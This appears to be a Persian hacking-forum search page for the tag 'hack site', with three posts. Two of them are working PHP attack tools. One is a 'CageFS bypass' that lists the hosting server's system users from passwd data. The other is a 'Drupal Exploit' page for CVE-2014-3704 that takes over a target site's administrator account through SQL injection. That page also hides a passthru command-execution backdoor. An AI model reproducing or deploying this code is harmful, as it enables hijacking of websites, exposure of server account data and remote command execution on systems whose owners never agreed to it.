جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'hack site'.
3 نتیجه پیدا شد
-
با سلام خدمت دوستان عزیز انجمن . در این تاپیک براتون cms های اختصاصی وب سایت ها رو قرار میدم . تاپیک ها رو لایک کنید تا cms ها زودتر قرار بگیرند . روش کار : شما ابتدا فایل zip رو دانلود میکنید که برای هر cms هست و در کنارش یک فایل db.sql هم قرار میدم که دیتابیس اون سایت هست و کافیه فایل ها رو توی هاست یا لوکال هاست قرار بدید و کوئری ها sql رو توی phpmyadmin اجرا کنید و در نهایت اتصال به دیتابیس و کار تمومه . قوانین تاپیک : سوالاتتون رو در بخش سوال و جواب بپرسید . تاپیک اسپم ارسال نکنید و برای تشکر از دکمه کنار تاپیک استفاده کنید . قبل از ارسال تاپیک در اینجا بنده رو در جریان بزارید . موفق و پیروز باشید .
-
<?php #Priv8 CageFS BYPASS #By Br0keN #/etc/passwd <center> <html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Priv8 CageFS Bypass</title> <style type="text/css" media="screen"> body { font-size: 10px; font-family: verdana; } INPUT { BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #ffffff; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 } </style> </head> <body dir="ltr" alink="#D50428" bgcolor="#ffffff" link="#00c000" text="#D50428" vlink="#000000"> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=5><b>Priv8 CageFS Bypass<br></font> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2> EHC TeaM By Br0keN <br><br> <p align="center" dir="rtl"><font color="#D50428"><span lang="ar-sa"><font size=2>Web:vb.ehcommunity.com<br><br><br> etc/passwd/</b></font><br> <?php error_reporting(E_ALL ^ E_NOTICE); if (function_exists('posix_getpwuid')) { if (isset($_POST['Br']) && isset($_POST['x0'])) { $Br = intval($_POST['Br']); $x0 = intval($_POST['x0']); while ($Br < $x0) { $uid = posix_getpwuid($Br); if ($uid) { $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $Br++; } } else { echo ' <form method="POST" action="?br0=x0">Uid FROM : <input type="text" name="Br" value="1" size="4"> TO : <input type="text" name="x0" value="1000" size="4"> <input type="submit" name="Show" value="Show">'; } } else die("Error..! Posix Functions are disabled..!!!"); die(); ?>
-
<!Doctype HTML> <html> <head> <script src='[Hidden Content]; <link rel="shortcut icon" href="[Hidden Content]; <title>Drupal Exploit</title> <style type="text/css"> .mymargin{ margin-top:30px; color:white; font-family: monospace; } body{ background-color:#999; } a { color: red; text-decoration: none; } h1 { color: #40E1C9 } h2 { color : #008000; } </style> </head> <body> <center> <img src="[Hidden Content]" width="150" height="160"> <div class="mymargin"> <center> <h1>Drupal Exploit</h1> <h2>Version 7.x</h2> <form method="GET" action=""> Site : <input type="text" name="url" placeholder="Example: www.site.com"> <input size="50" type="submit" name="submit" value="Attack"> </form> <br> <?php #-----------------------------------------------------------------------------# # Exploit Title: Drupal core 7.x - SQL Injection # # Date: Oct 16 2014 # # Exploit Author: Dustin Dörr # # Software Link: [Hidden Content] # # Version: Drupal core 7.x versions prior to 7.32 # # CVE: CVE-2014-3704 # #-----------------------------------------------------------------------------# error_reporting(0); if ($_POST['alleailss']){ $alleailss = $_POST['alleailss']; passthru($alleailss); } if(isset($_GET['submit'])){ $log = "/user/login"; $url = "[Hidden Content]']; $holako = "/?q=user"; $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; $params = array( 'http' => array( 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $post_data ) ); $ctx = stream_context_create($params); $data = file_get_contents($url . '/user/login/', null, $ctx); echo "<h3>Testing user/login </h3>"; if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) { echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>"; } else { echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; } } if(isset($_GET['submit'])){ $url = "[Hidden Content]']."/"; $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; $params = array( 'http' => array( 'method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", 'content' => $post_data ) ); $ctx = stream_context_create($params); $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); echo '<h3>Testing at Index</h3>'; if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>"; } else { echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; } } ?> <h3>Developed By <a href="[Hidden Content]; </div> </body> </html>
-
- سایت هکیگ
- اکسپلویت هک سایت
-
(و 3 مورد دیگر)
برچسب زده شده با :